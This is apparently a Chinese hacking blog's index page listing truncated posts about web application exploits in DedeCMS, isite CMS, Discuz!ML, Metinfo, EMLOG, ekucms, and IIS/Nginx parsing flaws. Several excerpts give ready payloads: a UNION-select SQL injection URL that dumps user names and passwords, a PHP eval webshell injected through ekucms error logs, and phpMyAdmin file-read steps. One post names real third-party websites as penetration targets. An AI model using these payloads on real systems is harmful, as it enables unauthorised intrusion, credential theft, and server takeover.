织梦cms注入漏洞

小俊 | WEB漏洞大全 | 2020-03-24
网上已经有几篇这样的文章了,当然我也是汇总了一些方法,并非原创。这个0day注入漏洞是1月份爆出来的,立马有人写出了利用方法。当然,渗透之路并非一番风顺,dede的安全防护做的也很好,所以成功与否仍然还是要看运气。     测试的是这两个网站:http://www.bianminxueche.com/ 和 http://www.newflash.tv/ ,利 [阅读全文]
ė383次浏览 60条评论 0

isite Cms SQL injection vulnerability exists

小俊 | WEB漏洞大全 | 2020-03-24
isite Cms Exp: index.php/iss/search/search/24%20and%201=2%20union%20select%201,name,3,4,5,6,7,password,9,10%20from%20flexi_user [阅读全文]
ė198次浏览 60条评论 0

Discuz!ML v.3.X存在代码注入漏洞

小俊 | WEB漏洞大全 | 2020-03-24
漏洞简述 Discuz! ML存在任意代码执行漏洞。该漏洞存在于请求流量中的cookie参数中的language字段,攻击者能够利用该漏洞在请求流量的cookie字段中(language参数)插入任意代码,最终执行任意代码,从而实现完全远程接管整个服务器的目的,该漏洞利用方式简单,危害性较大。 影响范围 Discuz!ML v.3.4 Di [阅读全文]
ė405次浏览 60条评论 0

韩国AutoSet建站程序漏洞0day

小俊 | WEB漏洞大全 | 2020-03-21
 任意用户名密码登录 phpmyadmin登录账号密码随意输入登录 select @@basedir; //查看Mysql路径  CREATE TABLE `test` ( `c` varchar(255) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8 //建立test用户和test表  LOAD DA [阅读全文]
ė255次浏览 60条评论 0

Metinfo 5.3.17 前台SQL注入漏洞分析

小俊 | WEB漏洞大全 | 2020-03-21
Metinfo 8月1日升级了版本,修复了一个影响小于等于5.3.17版本(几乎可以追溯到所有5.x版本)的SQL注入漏洞。这个SQL注入漏洞不受软WAF影响,可以直接获取数据,影响较广。 0x01. 漏洞原理分析 漏洞出现在 /include/global.func.php 文件的 jump_pseudo 函数: get_one($query); [阅读全文]
ė171次浏览 60条评论 0

RIM漏洞(附批量exp)

小俊 | WEB漏洞大全 | 2020-03-20
 下载mjet,https://github.com/mogwaisec/mjet 按照说明中的步骤: Copy the "MBean" folder to "data/java/metasploit" Copy java_mlet_server.rb to "modules/exploits/multi/misc/" 这里有个坑,metasploit默认目录里没有dat [阅读全文]
ė203次浏览 60条评论 0

iis6.0解析漏洞

小俊 | WEB漏洞大全 | 2020-03-20
我们已经进入了后台,我们看看有没有任意上传漏洞 可以看到这里没有任意文件上传漏洞,那么我们就利用IIS6.0的解析漏洞来试试 我们现在用BurpSuite来修改传递的数据包来突破试试 我们先来看看我们的asp一句话木马代码 我们来访问一些刚刚 [阅读全文]
ė157次浏览 60条评论 0

Nginx解析漏洞

小俊 | WEB漏洞大全 | 2020-03-20
Nginx中的解析漏洞是由于PHP配置错误导致的 我们还可以简单的判断是否存在解析漏洞: 如果存在解析漏洞,会把图片的代码以乱码显示出来,如果不存在,那么会提示页面不存在,404页面等。 Nginx解析漏洞利用方式:     /free.jpg/free [阅读全文]
ė178次浏览 60条评论 0

EMLOG敏感信息泄漏漏洞

小俊 | WEB漏洞大全 | 2020-03-20
漏洞地址 /admin/index.php 如上图,我们只要构造如下的URL: https://www.0dayhack.com/admin/index.php?action=phpinfo 直接访问: 测试某博客如下图 触发条件: 需要登陆(至少是网站的会员/作者权限) 处理方法: [阅读全文]
ė151次浏览 60条评论 0

易酷cms漏洞getshell

小俊 | WEB漏洞大全 | 2020-03-20
测试版本:易酷cms2.5 包含一句话:/ekucms2.5/?s=my/show/id/{~eval($_POST[x])} 会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日 错误日志内容 包含错误日志,地址:/ekucms2.5/?s=my/show/id//../ [阅读全文]
ė347次浏览 60条评论 0

Ɣ回顶部